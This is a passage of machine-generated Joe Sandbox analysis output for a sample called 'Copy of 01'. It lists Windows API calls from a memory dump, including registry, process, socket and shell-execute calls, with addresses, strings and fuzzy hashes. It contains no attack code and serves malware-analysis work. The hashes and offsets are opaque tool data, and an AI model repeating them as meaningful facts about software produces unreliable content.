                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        • Opcode ID: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                        • Instruction ID: 924e94311298f20f006d8290e0ceade1920ec93d5608ee88c284543db78a5cb5
                        • Opcode Fuzzy Hash: 6c09959c0b8c78984bf53122f0720b363d1e44d1eb9541171b9120f8843b28a1
                        • Instruction Fuzzy Hash: C121AD74904305AFCF268F69DC04A9A7BB8EF47760F204A18F8A1E62E0E7709940CF20
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A0601
                        Similarity
                        • API ID: CreateHandlePipe
                        • String ID: nul
                        • API String ID: 1424370930-2873401336
                        APIs
                          • Part of subcall function 0033600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0033604C
                          • Part of subcall function 0033600E: GetStockObject.GDI32(00000011), ref: 00336060
                          • Part of subcall function 0033600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033606A
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C4112
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C411F
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C412A
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C4139
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C4145
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        APIs
                          • Part of subcall function 0036D7A3: _free.LIBCMT ref: 0036D7CC
                        • _free.LIBCMT ref: 0036D82D
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036D838
                        • _free.LIBCMT ref: 0036D843
                        • _free.LIBCMT ref: 0036D897
                        • _free.LIBCMT ref: 0036D8A2
                        • _free.LIBCMT ref: 0036D8AD
                        • _free.LIBCMT ref: 0036D8B8
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0039DA74
                        • LoadStringW.USER32(00000000), ref: 0039DA7B
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0039DA91
                        • LoadStringW.USER32(00000000), ref: 0039DA98
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039DADC
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 0039DAB9
                        Similarity
                        • API ID: HandleLoadModuleString$Message
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 4072794657-3128320259
                        APIs
                        • InterlockedExchange.KERNEL32(014AFBE0,014AFBE0), ref: 003A097B
                        • EnterCriticalSection.KERNEL32(014AFBC0,00000000), ref: 003A098D
                        • TerminateThread.KERNEL32(014A9F48,000001F6), ref: 003A099B
                        • WaitForSingleObject.KERNEL32(014A9F48,000003E8), ref: 003A09A9
                        • CloseHandle.KERNEL32(014A9F48), ref: 003A09B8
                        • InterlockedExchange.KERNEL32(014AFBE0,000001F6), ref: 003A09C8
                        • LeaveCriticalSection.KERNEL32(014AFBC0), ref: 003A09CF
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        APIs
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003B1DC0
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003B1DE1
                        • WSAGetLastError.WSOCK32 ref: 003B1DF2
                        • htons.WSOCK32(?,?,?,?,?), ref: 003B1EDB
                        • inet_ntoa.WSOCK32(?), ref: 003B1E8C
                          • Part of subcall function 003939E8: _strlen.LIBCMT ref: 003939F2
                          • Part of subcall function 003B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,003AEC0C), ref: 003B3240
                        • _strlen.LIBCMT ref: 003B1F35
                        Similarity
                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                        • String ID:
                        • API String ID: 3203458085-0
                        APIs
                        • __allrem.LIBCMT ref: 003600BA
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003600D6
                        • __allrem.LIBCMT ref: 003600ED
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036010B
                        • __allrem.LIBCMT ref: 00360122
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00360140
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003582D9,003582D9,?,?,?,0036644F,00000001,00000001,8BE85006), ref: 00366258
                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036644F,00000001,00000001,8BE85006,?,?,?), ref: 003662DE
                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003663D8
                        • __freea.LIBCMT ref: 003663E5
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • __freea.LIBCMT ref: 003663EE
                        • __freea.LIBCMT ref: 00366413
                        Similarity
                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                        • String ID:
                        • API String ID: 1414292761-0
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBCCA
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBD25
                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBD6A
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003BBD99
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003BBDF3
                        • RegCloseKey.ADVAPI32(?), ref: 003BBDFF
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                        • String ID:
                        • API String ID: 1120388591-0
                        APIs
                        • VariantInit.OLEAUT32(00000035), ref: 0038F7B9
                        • SysAllocString.OLEAUT32(00000001), ref: 0038F860
                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F889
                        • VariantClear.OLEAUT32(0038FA64), ref: 0038F8AD
                        • VariantCopy.OLEAUT32(0038FA64,00000000), ref: 0038F8B1
                        • VariantClear.OLEAUT32(?), ref: 0038F8BB
                        Similarity
                        • API ID: Variant$ClearCopy$AllocInitString
                        • String ID:
                        • API String ID: 3859894641-0
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • GetOpenFileNameW.COMDLG32(00000058), ref: 003A94E5
                        • _wcslen.LIBCMT ref: 003A9506
                        • _wcslen.LIBCMT ref: 003A952D
                        • GetSaveFileNameW.COMDLG32(00000058), ref: 003A9585
                        Similarity
                        • API ID: _wcslen$FileName$OpenSave
                        • String ID: X
                        • API String ID: 83654149-3081909835
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • BeginPaint.USER32(?,?,?), ref: 00349241
                        • GetWindowRect.USER32(?,?), ref: 003492A5
                        • ScreenToClient.USER32(?,?), ref: 003492C2
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003492D3
                        • EndPaint.USER32(?,?,?,?,?), ref: 00349321
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003871EA
                          • Part of subcall function 00349339: BeginPath.GDI32(00000000), ref: 00349357
                        Similarity
                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                        • String ID:
                        • API String ID: 3050599898-0
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003A080C
                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003A0847
                        • EnterCriticalSection.KERNEL32(?), ref: 003A0863
                        • LeaveCriticalSection.KERNEL32(?), ref: 003A08DC
                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003A08F3
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A0921
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                        • String ID:
                        • API String ID: 3368777196-0
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0038F3AB,00000000,?,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 003C824C
                        • EnableWindow.USER32(00000000,00000000), ref: 003C8272
                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C82D1
                        • ShowWindow.USER32(00000000,00000004), ref: 003C82E5
                        • EnableWindow.USER32(00000000,00000001), ref: 003C830B
                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003C832F
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00394C95
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00394CB2
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00394CEA
                        • _wcslen.LIBCMT ref: 00394D08
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00394D10
                        • _wcsstr.LIBVCRUNTIME ref: 00394D1A
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                        • String ID:
                        • API String ID: 72514467-0
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                        • _wcslen.LIBCMT ref: 003A587B
                        • CoInitialize.OLE32(00000000), ref: 003A5995
                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A59AE
                        • CoUninitialize.OLE32 ref: 003A59CC
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 3172280962-24824748
                        APIs
                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                          • Part of subcall function 00390FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                          • Part of subcall function 00390FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                          • Part of subcall function 00390FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                          • Part of subcall function 00390FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                        • GetLengthSid.ADVAPI32(?,00000000,00391335), ref: 003917AE
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003917BA
                        • HeapAlloc.KERNEL32(00000000), ref: 003917C1
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 003917DA
                        • GetProcessHeap.KERNEL32(00000000,00000000,00391335), ref: 003917EE
                        • HeapFree.KERNEL32(00000000), ref: 003917F5
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003914FF
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00391506
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00391515
                        • CloseHandle.KERNEL32(00000004), ref: 00391520
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039154F
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00391563
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        APIs
                        • GetLastError.KERNEL32(?,?,00353379,00352FE5), ref: 00353390
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035339E
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003533B7
                        • SetLastError.KERNEL32(00000000,?,00353379,00352FE5), ref: 00353409
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        APIs
                        • GetLastError.KERNEL32(?,?,00365686,00373CD6,?,00000000,?,00365B6A,?,?,?,?,?,0035E6D1,?,003F8A48), ref: 00362D78
                        • _free.LIBCMT ref: 00362DAB
                        • _free.LIBCMT ref: 00362DD3
                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DE0
                        • SetLastError.KERNEL32(00000000,?,?,?,?,0035E6D1,?,003F8A48,00000010,00334F4A,?,?,00000000,00373CD6), ref: 00362DEC
                        • _abort.LIBCMT ref: 00362DF2
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        APIs
                          • Part of subcall function 00349639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00349693
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496A2
                          • Part of subcall function 00349639: BeginPath.GDI32(?), ref: 003496B9
                          • Part of subcall function 00349639: SelectObject.GDI32(?,00000000), ref: 003496E2
                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003C8A4E
                        • LineTo.GDI32(?,00000003,00000000), ref: 003C8A62
                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003C8A70
                        • LineTo.GDI32(?,00000000,00000003), ref: 003C8A80
                        • EndPath.GDI32(?), ref: 003C8A90
                        • StrokePath.GDI32(?), ref: 003C8AA0
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        APIs
                        • GetDC.USER32(00000000), ref: 00395218
                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00395229
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00395230
                        • ReleaseDC.USER32(00000000,00000000), ref: 00395238
                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039524F
                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00395261
                        Similarity
                        • API ID: CapsDevice$Release
                        • String ID:
                        • API String ID: 1035833867-0
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00331BF4
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00331BFC
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00331C07
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00331C12
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00331C1A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00331C22
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0039EB30
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0039EB46
                        • GetWindowThreadProcessId.USER32(?,?), ref: 0039EB55
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB64
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB6E
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0039EB75
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        APIs
                        • GetClientRect.USER32(?), ref: 00387452
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00387469
                        • GetWindowDC.USER32(?), ref: 00387475
                        • GetPixel.GDI32(00000000,?,?), ref: 00387484
                        • ReleaseDC.USER32(?,00000000), ref: 00387496
                        • GetSysColor.USER32(00000005), ref: 003874B0
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039187F
                        • UnloadUserProfile.USERENV(?,?), ref: 0039188B
                        • CloseHandle.KERNEL32(?), ref: 00391894
                        • CloseHandle.KERNEL32(?), ref: 0039189C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 003918A5
                        • HeapFree.KERNEL32(00000000), ref: 003918AC
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0033BEB3
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: D%@$D%@$D%@$D%@D%@
                        • API String ID: 1385522511-1921936383
                        APIs
                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        • __Init_thread_footer.LIBCMT ref: 003B7BFB
                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                        • String ID: +T8$5$G$Variable must be of type 'Object'.
                        • API String ID: 535116098-1932661733
                        APIs
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C6EE
                        • _wcslen.LIBCMT ref: 0039C735
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C79C
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039C7CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default
                        • String ID: 0
                        • API String ID: 1227352736-4108050209
                        • Opcode ID: 7710aa114433c01ddb82ce8a831a32142dd3a2185102cb3ce6f6b78facf2b6fc
                        • Instruction ID: 2c2055b45f246f24631369c05e52af54afa4fc8607dfee1ff71c133893b29fbb
                        • Opcode Fuzzy Hash: 7710aa114433c01ddb82ce8a831a32142dd3a2185102cb3ce6f6b78facf2b6fc
                        • Instruction Fuzzy Hash: 2751EF726243009FDB129F68C885B6BB7E8AF49310F082A2DF995E71E0DB74DD04CB52
                        APIs
                        • ShellExecuteExW.SHELL32(0000003C), ref: 003BAEA3
                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                        • GetProcessId.KERNEL32(00000000), ref: 003BAF38
                        • CloseHandle.KERNEL32(00000000), ref: 003BAF67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseExecuteHandleProcessShell_wcslen
                        • String ID: <$@
                        • API String ID: 146682121-1426351568
                        • Opcode ID: 6e6d6ded0f4fb89a9ceeb91be09f681d70083acefb07a9b869afcda6c88efc3e
                        • Instruction ID: e3abea7474b37f7092d13c6a801548e2f7d3db620e35da19ac93007b685e908c
                        • Opcode Fuzzy Hash: 6e6d6ded0f4fb89a9ceeb91be09f681d70083acefb07a9b869afcda6c88efc3e
                        • Instruction Fuzzy Hash: 0D717775A00A18DFCB16DF54C484A9EBBF0BF08314F058499E856AF7A2CB74ED41CB91
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00397206
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039723C
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039724D
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003972CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                        • Instruction ID: aef1fbe1eb146554f81be2a67f22ce51ac65557b8bff15777f6c4f31df5ed0a4
                        • Opcode Fuzzy Hash: 2c27b52494a5ed717e6b523666422b7824c136e56eda254bbad4d92d756a7fde
                        • Instruction Fuzzy Hash: 31418E72624204EFDF16CF54C884A9A7BA9EF44710F2584A9FD09DF28AD7B1DD40CBA0
                        APIs
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C2F8D
                        • LoadLibraryW.KERNEL32(?), ref: 003C2F94
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C2FA9
                        • DestroyWindow.USER32(?), ref: 003C2FB1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyLibraryLoadWindow
                        • String ID: SysAnimate32
                        • API String ID: 3529120543-1011021900
                        • Opcode ID: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                        • Instruction ID: 79338a4c1d4d0a03ca501d166e3cafc585f22e994e2b3670428ced915eb555c7
                        • Opcode Fuzzy Hash: e74fb0f2eea6cd0bd91886870837b1d529cbe2079a6027dc37d0822608d5402e
                        • Instruction Fuzzy Hash: 1E21AC72204209ABEB228F64DC80FBB77BDEB59364F12562CFA50D61A0DB71EC519760
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002), ref: 00354D8D
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00354DA0
                        • FreeLibrary.KERNEL32(00000000,?,?,?,00354D1E,003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000), ref: 00354DC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                        • Instruction ID: a0c4dd18dcbdfefaca2e9603b6fbe6e90d87aa5378a33bdc364f7aeb5aa1416c
                        • Opcode Fuzzy Hash: 18badcfbdbb59c4b08fb18e3ea1d0ed0597a0c58453d05eba831195b68eeda5a
                        • Instruction Fuzzy Hash: 98F08C35A50208ABDB169B90DC49FEEBBF8EF04712F0400A4EC09A6260CB30A984CB90
                        APIs
                        • LoadLibraryA.KERNEL32 ref: 0038D3AD
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038D3BF
                        • FreeLibrary.KERNEL32(00000000), ref: 0038D3E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: GetSystemWow64DirectoryW$X64
                        • API String ID: 145871493-2590602151
                        • Opcode ID: d6acae019a3340cd75dd6769bd02aab0e1291a39984b301b319b2415d4d2f961
